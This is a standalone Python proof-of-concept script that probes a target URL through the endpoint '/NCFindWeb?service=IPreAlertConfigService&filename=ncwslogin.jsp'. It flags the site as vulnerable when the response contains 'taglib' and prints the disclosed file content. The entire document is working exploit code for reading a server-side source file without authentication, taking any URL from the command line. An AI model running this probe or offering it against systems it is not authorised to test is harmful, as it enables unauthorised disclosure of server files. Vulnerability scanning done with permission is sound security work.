#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import getopt
import random
import re
import sys

import requests
dir_list = ['/NCFindWeb?service=IPreAlertConfigService&filename=ncwslogin.jsp']

class Poc(object):

    def verify(self, data):
        for d in dir_list:
            url = data['url'].strip('/') + d
            headers = data['headers']
            try:
                response = requests.request('get', url, headers=headers, timeout=2, allow_redirects=False)
                if 'taglib' in response.text:
                    return {
                        'title': '{} 存在漏洞'.format(data['url']),
                        'desc': '返回内容为: {}'.format(response.text)
                    }
            except Exception:
                pass

        return None

if __name__ == "__main__":
    url = sys.argv[1]
    p = Poc()
    r = p.verify({
        'url': url,
        'headers': {}
    })
    print(r)